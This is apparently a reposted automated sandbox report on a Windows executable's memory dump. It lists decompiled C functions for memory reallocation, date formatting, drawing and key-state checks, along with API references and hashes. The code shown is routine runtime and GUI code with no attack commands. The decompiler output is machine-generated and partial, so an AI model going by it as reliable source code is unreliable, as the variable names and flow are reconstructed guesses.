0x0040c5ad 0x0040c5b4 0x0040c5c8 0x0040c5cd 0x0040c5b6 0x0040c5b9 0x0040c5be 0x0040c5be 0x0040c5d2 0x0040c5df 0x0040c5eb 0x0040c6a7 0x0040c6ad 0x0040c6b7 0x0040c6bd 0x0040c6c4 0x0040c6ca 0x0040c6e0 0x0040c6e5 0x0040c6f7 0x0040c60e 0x0040c611 0x0040c617 0x0040c62f 0x0040c640 0x0040c64b 0x0040c651 0x0040c65b 0x0040c661 0x0040c668 0x0040c66e 0x0040c684 0x0040c689 0x0040c69b 0x0040c6a0 0x0040c700 0x0040c703 0x0040c706 0x0040c711 0x0040c721 0x0040c72e

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040C72F), ref: 0040C5DF GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040C72F), ref: 0040C601 Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772

Strings

Lv@ , xrefs: 0040C5B9

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileLoadModuleNameQueryStringVirtual String ID: Lv@ API String ID: 902310565-2306355798 Opcode ID: a64f8a922244f8bc9df9dcd3d48b1ff787754f54841e870c1e5b0c2d58ac1ace Instruction ID: 312cfa349de001423b8fa7d1abb7a1f31512e968929e1d2ab1301cf878b75628 Opcode Fuzzy Hash: a64f8a922244f8bc9df9dcd3d48b1ff787754f54841e870c1e5b0c2d58ac1ace Instruction Fuzzy Hash: AB311870900658DFDB61DB64CD81BDAB7F9AB49304F4040FAE508A7291E7B8AE848F55

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%

E00401D68(signed int __eax, signed int __edx, void* __edi) { signed int _t58; signed int _t73; signed int _t80; signed int _t86; signed int _t94; signed int _t100; void* _t102; signed int _t111; signed int _t119; signed int _t125; signed int _t131; signed int _t133; signed int _t136; intOrPtr _t139; void* _t141; signed int _t143; signed int _t145; unsigned int _t146; signed int _t153; unsigned int _t154; intOrPtr _t157; void* _t160; intOrPtr _t168; intOrPtr _t170; signed int _t173; signed int _t174; signed int _t175; void* _t182; unsigned int _t184; signed int _t190; signed int _t193; signed int _t195; signed int _t196; signed int _t198; void* _t202; signed int _t203; signed int _t204; void* _t205; signed int _t208; _t181 = __edi; _t166 = __edx; _t145 = *(__eax - 4); _t196 = __eax; if((_t145 & 0x00000007) != 0) { __eflags = _t145 & 0x00000005; if((_t145 & 0x00000005) != 0) { __eflags = _t145 & 0x00000003; if((_t145 & 0x00000003) != 0) { __eflags = 0; return 0; } else { _t146 = _t145 - 0x18; __eflags = __edx - _t146; if(__edx <= _t146) { __eflags = __edx - _t146 >> 1; if(__edx < _t146 >> 1) { _t131 = __edx; _t58 = E00401820(__edx); __eflags = _t58; if(_t58 == 0) { goto L61; } else { __eflags = _t131 - 0x40a2c; if(_t131 > 0x40a2c) { *((intOrPtr*)(_t58 - 8)) = _t131; } E004015A0(_t196, _t131, _t58); E00401B88(_t196, _t181); return _t58; } } else { *((intOrPtr*)(__eax - 8)) = __edx; return __eax; } } else { asm("adc eax, 0xffffffff"); _t133 = (0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx; _push(__edx); _t58 = E00401820((0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx); _pop(_t168); __eflags = _t58; if(_t58 != 0) { __eflags = _t133 - 0x40a2c; if(_t133 > 0x40a2c) { *((intOrPtr*)(_t58 - 8)) = _t168; } E00401570(_t196, *((intOrPtr*)(_t196 - 8)), _t58); E00401B88(_t196, _t181); return _t58; } L61: return _t58; } } } else { _t153 = _t145 & 0xfffffff0; _push(__edi); _t182 = _t153 + __eax; _t154 = _t153 - 4; _t136 = _t145 & 0x0000000f; __eflags = __edx - _t154; if(__edx > _t154) { _t73 = *(_t182 - 4); __eflags = _t73 & 0x00000001; if((_t73 & 0x00000001) == 0) { L51: asm("adc edi, 0xffffffff"); _t198 = ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166; _t184 = _t154; _t80 = E00401820(((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166); _t170 = _t166; __eflags = _t80; if(_t80 == 0) { goto L49; } else { __eflags = _t198 - 0x40a2c; if(_t198 > 0x40a2c) { *((intOrPtr*)(_t80 - 8)) = _t170; } E00401570(_t196, _t184, _t80); E00401B88(_t196, _t184); return _t80; } } else { _t86 = _t73 & 0xfffffff0; _t202 = _t154 + _t86; __eflags = __edx - _t202; if(__edx > _t202) { goto L51; } else { __eflags = *0x46304d; if(__eflags == 0) { L42: __eflags = _t86 - 0xb30; if(_t86 >= 0xb30) { E004015BC(_t182); _t166 = _t166; _t154 = _t154; } asm("adc edi, 0xffffffff"); _t94 = (_t166 + ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + 0x000000d3 & 0xffffff00) + 0x30; _t173 = _t202 + 4 - _t94; __eflags = _t173; if(_t173 > 0) { *(_t196 + _t202 - 4) = _t173; *((intOrPtr*)(_t196 - 4 + _t94)) = _t173 + 3; _t203 = _t94; __eflags = _t173 - 0xb30; if(_t173 >= 0xb30) { __eflags = _t94 + _t196; E004015FC(_t94 + _t196, _t154, _t173); } } else { *(_t196 + _t202) = *(_t196 + _t202) & 0xfffffff7; _t203 = _t202 + 4; } _t204 = _t203 | _t136; __eflags = _t204; *(_t196 - 4) = _t204; *0x463718 = 0; _t80 = _t196; L49: return _t80; } else { while(1) { asm("lock cmpxchg [0x463718], ah"); if(__eflags == 0) { break; } Sleep(0); _t166 = _t166; _t154 = _t154; asm("lock cmpxchg [0x463718], ah"); if(__eflags != 0) { Sleep(0xa); _t166 = _t166; _t154 = _t154; continue; } break; } _t136 = 0x0000000f & *(_t196 - 4); _t100 = *(_t182 - 4); __eflags = _t100 & 0x00000001; if((_t100 & 0x00000001) == 0) { L50: *0x463718 = 0; goto L51; } else { _t86 = _t100 & 0xfffffff0; _t202 = _t154 + _t86; __eflags = _t166 - _t202; if(_t166 > _t202) { goto L50; } else { goto L42; } } } } } } else { _t205 = __edx + __edx; __eflags = _t205 - _t154; if(_t205 < _t154) { __eflags = __edx - 0xb2c; if(__edx >= 0xb2c) { L19: _t16 = _t166 + 0xd3; // 0xbff _t208 = (_t16 & 0xffffff00) + 0x30; _t157 = _t154 + 4 - _t208; __eflags = *0x46304d; if(__eflags != 0) { while(1) { asm("lock cmpxchg [0x463718], ah"); if(__eflags == 0) { break; } Sleep(0); _t157 = _t157; asm("lock cmpxchg [0x463718], ah"); if(__eflags != 0) { Sleep(0xa); _t157 = _t157; continue; } break; } _t136 = 0x0000000f & *(_t196 - 4); __eflags = 0xf; } *(_t196 - 4) = _t136 | _t208; _t139 = _t157; _t174 = *(_t182 - 4); __eflags = _t174 & 0x00000001; if((_t174 & 0x00000001) != 0) { _t102 = _t182; _t175 = _t174 & 0xfffffff0; _t139 = _t139 + _t175; _t182 = _t182 + _t175; __eflags = _t175 - 0xb30; if(_t175 >= 0xb30) { E004015BC(_t102); } } else { *(_t182 - 4) = _t174 | 0x00000008; } *((intOrPtr*)(_t182 - 8)) = _t139; *((intOrPtr*)(_t196 + _t208 - 4)) = _t139 + 3; __eflags = _t139 - 0xb30; if(_t139 >= 0xb30) { E004015FC(_t196 + _t208, _t157, _t139); } *0x463718 = 0; return _t196; } else { __eflags = _t205 - 0xb2c; if(_t205 < 0xb2c) { _t190 = __edx; _t111 = E00401820(__edx); __eflags = _t111; if(_t111 != 0) { E004015A0(_t196, _t190, _t111); E00401B88(_t196, _t190); } return _t111; } else { _t166 = 0xb2c; goto L19; } } } else { return __eax; } } } } else { _t141 = *_t145; _t160 = ( *(_t141 + 2) & 0x0000ffff) - 4; if(_t160 < __edx) { _push(__edi); _t193 = __edx; asm("adc eax, 0xffffffff"); _t119 = E00401820((0 & _t160 + _t160 + 0x00000020 - __edx) + __edx); __eflags = _t119; if(_t119 != 0) { __eflags = _t193 - 0x40a2c; if(_t193 > 0x40a2c) { *((intOrPtr*)(_t119 - 8)) = _t193; } __eflags = ( *(_t141 + 2) & 0x0000ffff) - 4; _t195 = _t119; *((intOrPtr*)(_t141 + 0x1c))(); E00401B88(_t196, _t195); _t119 = _t195; } return _t119; } else { if(0x40 + __edx * 4 < _t160) { _t143 = __edx; _t125 = E00401820(__edx); __eflags = _t125; if(_t125 != 0) { E004015A0(_t196, _t143, _t125); E00401B88(_t196, __edi); return _t125; } return _t125; } else { return __eax; } } } } 0x00401d68 0x00401d68 0x00401d68 0x00401d70 0x00401d72 0x00401e00 0x00401e03 0x00402054 0x00402057 0x004020e8 0x004020ec 0x0040205d 0x0040205d 0x00402060 0x00402062 0x004020aa 0x004020ac 0x004020b4 0x004020b8 0x004020bd 0x004020bf 0x00000000 0x004020c1 0x004020c1 0x004020c7 0x004020c9 0x004020c9 0x004020d4 0x004020db 0x004020e4 0x004020e4 0x004020ae 0x004020ae 0x004020b3 0x004020b3 0x00402064 0x0040206f 0x00402076 0x00402078 0x00402079 0x0040207e 0x0040207f 0x00402081 0x00402083 0x00402089 0x0040208b 0x0040208b 0x00402097 0x0040209e 0x00000000 0x004020a3 0x004020a7 0x004020a7 0x004020a7 0x00402062 0x00401e09 0x00401e0b 0x00401e0e 0x00401e0f 0x00401e12 0x00401e15 0x00401e18 0x00401e1b 0x00401f20 0x00401f23 0x00401f25 0x0040200c 0x00402017 0x0040201e 0x00402020 0x00402023 0x00402028 0x00402029 0x0040202b 0x00000000 0x0040202d 0x0040202d 0x00402033 0x00402035 0x00402035 0x00402040 0x00402047 0x00402052 0x00402052 0x00401f2b 0x00401f2b 0x00401f2e 0x00401f31 0x00401f33 0x00000000 0x00401f39 0x00401f39 0x00401f40 0x00401f91 0x00401f91 0x00401f96 0x00401f9c 0x00401fa1 0x00401fa2 0x00401fa2 0x00401fae 0x00401fbf 0x00401fc5 0x00401fc5 0x00401fc7 0x00401fd4 0x00401fdb 0x00401fdf 0x00401fe1 0x00401fe7 0x00401fe9 0x00401feb 0x00401feb 0x00401fc9 0x00401fc9 0x00401fcd 0x00401fcd 0x00401ff0 0x00401ff0 0x00401ff2 0x00401ff5 0x00401ffc 0x00401ffe 0x00402002 0x00401f42 0x00401f42 0x00401f47 0x00401f4f 0x00000000 0x00000000 0x00401f55 0x00401f5a 0x00401f5b 0x00401f61 0x00401f69 0x00401f6f 0x00401f74 0x00401f75 0x00000000 0x00401f75 0x00000000 0x00401f69 0x00401f7d 0x00401f80 0x00401f83 0x00401f85 0x00402005 0x00402005 0x00000000 0x00401f87 0x00401f87 0x00401f8a 0x00401f8d 0x00401f8f 0x00000000 0x00000000 0x00000000 0x00000000 0x00401f8f 0x00401f85 0x00401f40 0x00401f33 0x00401e21 0x00401e21 0x00401e24 0x00401e26 0x00401e30 0x00401e36 0x00401e49 0x00401e49 0x00401e55 0x00401e5b 0x00401e5d 0x00401e64 0x00401e66 0x00401e6b 0x00401e73 0x00000000 0x00000000 0x00401e78 0x00401e7d 0x00401e83 0x00401e8b 0x00401e90 0x00401e95 0x00000000 0x00401e95 0x00000000 0x00401e8b 0x00401e9d 0x00401e9d 0x00401e9d 0x00401ea2 0x00401ea5 0x00401ea7 0x00401eaa 0x00401ead 0x00401eb8 0x00401eba 0x00401ebd 0x00401ebf 0x00401ec1 0x00401ec7 0x00401ec9 0x00401ec9 0x00401eaf 0x00401eb2 0x00401eb2 0x00401ece 0x00401ed4 0x00401ed8 0x00401ede 0x00401ee5 0x00401ee5 0x00401eea 0x00401ef7 0x00401e38 0x00401e38 0x00401e3e 0x00401ef8 0x00401efc 0x00401f01 0x00401f03 0x00401f0d 0x00401f14 0x00401f14 0x00401f1f 0x00401e44 0x00401e44 0x00000000 0x00401e44 0x00401e3e 0x00401e28 0x00401e2c 0x00401e2c 0x00401e26 0x00401e1b 0x00401d78 0x00401d78 0x00401d7e 0x00401d83 0x00401dc0 0x00401dc1 0x00401dc7 0x00401dce 0x00401dd3 0x00401dd5 0x00401dd7 0x00401ddd 0x00401ddf 0x00401ddf 0x00401de6 0x00401deb 0x00401def 0x00401df4 0x00401df9 0x00401df9 0x00401dfe 0x00401d85 0x00401d8e 0x00401d94 0x00401d98 0x00401d9d 0x00401d9f 0x00401da9 0x00401db0 0x00000000 0x00401db5 0x00401db9 0x00401d92 0x00401d92 0x00401d92 0x00401d8e 0x00401d83

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 028d8d3468e21b9f8e1c609a3c3ddb42240f5f23514891230630539b3f9fe126 Instruction ID: 6b3b6843e27bb62f7e5d94541143b704e997bbcd7bebc6a2cddc521959e2f60c Opcode Fuzzy Hash: 028d8d3468e21b9f8e1c609a3c3ddb42240f5f23514891230630539b3f9fe126 Instruction Fuzzy Hash: C2A1F5637106004BD718AA7D9D8536EB3819BC5366F58823FF515EB3E2EB7C8D418289

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 76%

E0040A67C(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) { char _v8; short _v18; short _v22; struct _SYSTEMTIME _v24; char _v280; intOrPtr _v284; char* _t34; intOrPtr* _t50; intOrPtr _t59; void* _t64; intOrPtr _t66; void* _t70; _v8 = 0; _t50 = __edx; _t64 = __eax; _push(_t70); _push(0x40a76a); _push( *[fs:eax]); *[fs:eax] = _t70 + 0xfffffee8; E0040473C(__edx); _v24 = *(_a4 - 0xe) & 0x0000ffff; _v22 = *(_a4 - 0x10) & 0x0000ffff; _v18 = *(_a4 - 0x12) & 0x0000ffff; if(_t64 > 2) { E004047D4( &_v8, 0x40a78c); } else { E004047D4( &_v8, 0x40a780); } _t34 = E00404C00(_v8); if(GetDateFormatA(GetThreadLocale(), 4, &_v24, _t34, &_v280, 0x100) != 0) { E004049AC(_t50, 0x100, &_v280); if(_t64 == 1 && *((char*)( *_t50)) == 0x30) { _v284 = *_t50; _t66 = _v284; if(_t66 != 0) { _t66 = *((intOrPtr*)(_t66 - 4)); } E00404C60( *_t50, _t66 - 1, 2, _t50); } } _pop(_t59); *[fs:eax] = _t59; _push(E0040A771); return E0040473C( &_v8); } 0x0040a689 0x0040a68c 0x0040a68e 0x0040a692 0x0040a693 0x0040a698 0x0040a69b 0x0040a6a0 0x0040a6ac 0x0040a6b7 0x0040a6c2 0x0040a6c9 0x0040a6e2 0x0040a6cb 0x0040a6d3 0x0040a6d3 0x0040a6f6 0x0040a70f 0x0040a71e 0x0040a724 0x0040a72f 0x0040a735 0x0040a73d 0x0040a742 0x0040a742 0x0040a74f 0x0040a74f 0x0040a724 0x0040a756 0x0040a759 0x0040a75c 0x0040a769

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0040A76A), ref: 0040A702 GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0040A76A), ref: 0040A708

Strings

yyyy , xrefs: 0040A6DD

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: DateFormatLocaleThread String ID: yyyy API String ID: 3303714858-3145165042 Opcode ID: 6cf301cd4dbb5b34b884b87cd4e9d6bd7c982b661da83cb5c451281789fad814 Instruction ID: 8081e552295268892be29cc280909309cbc7073684cf05299d24970e3d403a10 Opcode Fuzzy Hash: 6cf301cd4dbb5b34b884b87cd4e9d6bd7c982b661da83cb5c451281789fad814 Instruction Fuzzy Hash: F12141756002189BDB11DBA5C982AAE73B8EF48700F5140B7F905F7381D738DE54D76A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 64%

E0043AD10(void* __eax, void* __ebx, void* __edi, void* __esi) { char _v8; char _v12; char _v16; intOrPtr _t31; void* _t36; intOrPtr _t42; struct HDC__* _t47; void* _t50; _push(__esi); _v16 = 0; _t36 = __eax; _push(_t50); _push(0x43ada6); _push( *[fs:eax]); *[fs:eax] = _t50 + 0xfffffff4; if( *((intOrPtr*)(__eax + 0x30)) == 0) { _v12 = *((intOrPtr*)(__eax + 8)); _v8 = 0xb; _t31 = *0x462dec; // 0x423568 E00406740(_t31, &_v16); E0040C158(_t36, _v16, 1, __edi, __esi, 0, &_v12); E00404184(); } _t47 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x30)))) + 0x48))(); SetViewportOrgEx(_t47, *(_t36 + 0x40), *(_t36 + 0x44), 0); IntersectClipRect(_t47, 0, 0, *(_t36 + 0x48), *(_t36 + 0x4c)); _pop(_t42); *[fs:eax] = _t42; _push(0x43adad); return E0040473C( &_v16); } 0x0043ad17 0x0043ad1a 0x0043ad1d 0x0043ad21 0x0043ad22 0x0043ad27 0x0043ad2a 0x0043ad31 0x0043ad36 0x0043ad39 0x0043ad46 0x0043ad4b 0x0043ad5a 0x0043ad5f 0x0043ad5f 0x0043ad6c 0x0043ad79 0x0043ad8b 0x0043ad92 0x0043ad95 0x0043ad98 0x0043ada5

APIs

SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0043AD79 IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 0043AD8B Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772

Strings

h5B , xrefs: 0043AD46

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipIntersectLoadRectStringViewport String ID: h5B API String ID: 2734429277-2204541312 Opcode ID: 39734b3fce4a725eba0d90988523030e866c8d2b1382112e9c4397644d4563ed Instruction ID: 1ef2c5308e92dbb7852dc5f6e9ef6c5674e045902edf6ecf16b6e61c915b5d41 Opcode Fuzzy Hash: 39734b3fce4a725eba0d90988523030e866c8d2b1382112e9c4397644d4563ed Instruction Fuzzy Hash: 51114F71600204AFDB44DF58CC81FAA77A8EB49314F5040AAFE04DB291EB79AD10CB59

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0043ADB8(void* __eflags, intOrPtr _a4) { signed char _v5; struct tagRECT _v21; struct tagRECT _v40; void* _t40; void* _t45; _v5 = 1; _t44 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x1cc)); _t45 = E0041A868( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x1cc)), *((intOrPtr*)(_a4 - 4))); if(_t45 <= 0) { L5: _v5 = 0; } else { do { _t45 = _t45 - 1; _t40 = E0041A80C(_t44, _t45); if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) { goto L4; } else { E0043A33C(_t40, &_v40); IntersectRect( &_v21, _a4 + 0xffffffec, &_v40); if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) { goto L4; } } goto L6; L4: } while (_t45 > 0); goto L5; } L6: return _v5 & 0x000000ff; } 0x0043adc1 0x0043adce 0x0043ade1 0x0043ade5 0x0043ae35 0x0043ae35 0x0043ade7 0x0043ade7 0x0043ade7 0x0043adf1 0x0043adf7 0x00000000 0x0043adff 0x0043ae04 0x0043ae18 0x0043ae2f 0x00000000 0x00000000 0x0043ae2f 0x00000000 0x0043ae31 0x0043ae31 0x00000000 0x0043ade7 0x0043ae39 0x0043ae43

APIs

IntersectRect.USER32 ref: 0043AE18 EqualRect.USER32 ref: 0043AE28

Strings

@ , xrefs: 0043ADF9

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$EqualIntersect String ID: @ API String ID: 3291753422-2766056989 Opcode ID: e938c2b76a2eeda78225ce8cf867d930fa1488dbab9837213577f1d7a8766f1b Instruction ID: 6e9426432a3e6fadb88004f381f8470911db4cd695cec418565dc038f1e98b7e Opcode Fuzzy Hash: e938c2b76a2eeda78225ce8cf867d930fa1488dbab9837213577f1d7a8766f1b Instruction Fuzzy Hash: 5811A031A442885BCB01DA6DC885BDF7BE89F49318F0442A6FC48EB382D779DE1587D5

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00422DC8(int _a4) { void* __ebx; void* __ebp; signed int _t2; signed int _t3; int _t8; void* _t12; void* _t13; void* _t17; void* _t18; _t8 = _a4; if( *0x466338 == 0) { *0x466310 = E00422CE4(0, _t8, *0x466310, _t17, _t18); return GetSystemMetrics(_t8); } _t3 = _t2 | 0xffffffff; _t12 = _t8 + 0xffffffb4 - 2; __eflags = _t12; if(__eflags < 0) { _t3 = 0; } else { if(__eflags == 0) { _t8 = 0; } else { _t13 = _t12 - 1; __eflags = _t13; if(_t13 == 0) { _t8 = 1; } else { __eflags = _t13 - 0xffffffffffffffff; if(_t13 - 0xffffffffffffffff < 0) { _t3 = 1; } } } } __eflags = _t3 - 0xffffffff; if(_t3 != 0xffffffff) { return _t3; } else { return GetSystemMetrics(_t8); } } 0x00422dcc 0x00422dd6 0x00422dea 0x00000000 0x00422df0 0x00422df8 0x00422e00 0x00422e00 0x00422e03 0x00422e17 0x00422e05 0x00422e05 0x00422e1b 0x00422e07 0x00422e07 0x00422e07 0x00422e08 0x00422e1f 0x00422e0a 0x00422e0b 0x00422e0e 0x00422e10 0x00422e10 0x00422e0e 0x00422e08 0x00422e05 0x00422e24 0x00422e27 0x00422e31 0x00422e29 0x00000000 0x00422e2a

APIs

GetSystemMetrics.USER32 ref: 00422E2A Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63 GetSystemMetrics.USER32 ref: 00422DF0

Strings

GetSystemMetrics , xrefs: 00422DD8

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$AddressProc String ID: GetSystemMetrics API String ID: 1792783759-96882338 Opcode ID: c25a38d46c1e4ffea5b60ab85707767b0b04cc81a25b6e54c2e579306e5f87fa Instruction ID: 5fc931f2355d86599297f92dc66c6923be0ac5e92dc587121fe74810b58b28c3 Opcode Fuzzy Hash: c25a38d46c1e4ffea5b60ab85707767b0b04cc81a25b6e54c2e579306e5f87fa Instruction Fuzzy Hash: A5F062307141507ACA254A38BE842267546AB45330FE25B37E5229A2D5DFFC8C91A25E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 61%

E0043369C(void* __eax) { signed char _v17; signed char _v24; signed int _t8; asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t8 = _v24 & 0x000000ff; if(_t8 != 0) { if(GetKeyState(0x10) < 0) { _t8 = _t8 + 0x2000; } if(GetKeyState(0x11) < 0) { _t8 = _t8 + 0x4000; } if((_v17 & 0x00000020) != 0) { _t8 = _t8 + 0x8000; } } return _t8; } 0x004336a7 0x004336a8 0x004336a9 0x004336aa 0x004336ab 0x004336b3 0x004336bf 0x004336c1 0x004336c1 0x004336d0 0x004336d2 0x004336d2 0x004336dc 0x004336de 0x004336de 0x004336dc 0x004336eb

APIs

GetKeyState.USER32(00000010), ref: 004336B7 GetKeyState.USER32(00000011), ref: 004336C8

Strings

, xrefs: 004336D7

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: State String ID: API String ID: 1649606143-3916222277 Opcode ID: 214cf5a452d32b715b633cccca3f99564eca22495acae71db1ba112392d63aef Instruction ID: 8f684c87d4741464f805386feb5dbb40cfecca0e0810653843f36d644f5af4db Opcode Fuzzy Hash: 214cf5a452d32b715b633cccca3f99564eca22495acae71db1ba112392d63aef Instruction Fuzzy Hash: 6FE02B2270464226E62179552C063D713904F417A9F0D066BBDC42B2C2D29F0B1550AA

Uniqueness

Uniqueness Score: -1.00%

Source: https://www.joesandbox.com/analysis/532011/0/html

Posted by: ruebenbochnerie.blogspot.com